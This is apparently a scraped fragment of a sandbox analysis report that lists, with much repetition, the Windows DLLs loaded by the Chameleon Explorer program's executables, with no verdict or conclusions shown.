                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: iertutil.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: profapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: winhttp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wbemcomn.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: sxs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: amsi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: userenv.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: urlmon.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: srvcli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: netutils.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: schannel.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: ntasn1.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: dpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: gpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: ncrypt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: mpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: shfolder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: symsrv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: folder.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: networkexplorer.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: drprov.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: ntlanman.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: davclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: davhlpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: playtodevice.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: devdispitemprovider.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mmdevapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: portabledeviceapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: audiodev.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wmvcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wmasf.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mfperfhelper.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mscms.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: coloradapterclient.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: folder64.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sxs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wbemcomn.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mscms.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: coloradapterclient.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winshfhc.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wdscore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dwmapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windowscodecs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dataexchange.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: d3d11.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dcomp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dxgi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: networkexplorer.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: secur32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: samcli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: samlib.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netutils.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: drprov.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ntlanman.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: davclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: davhlpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dlnashext.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: playtodevice.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: devdispitemprovider.dll
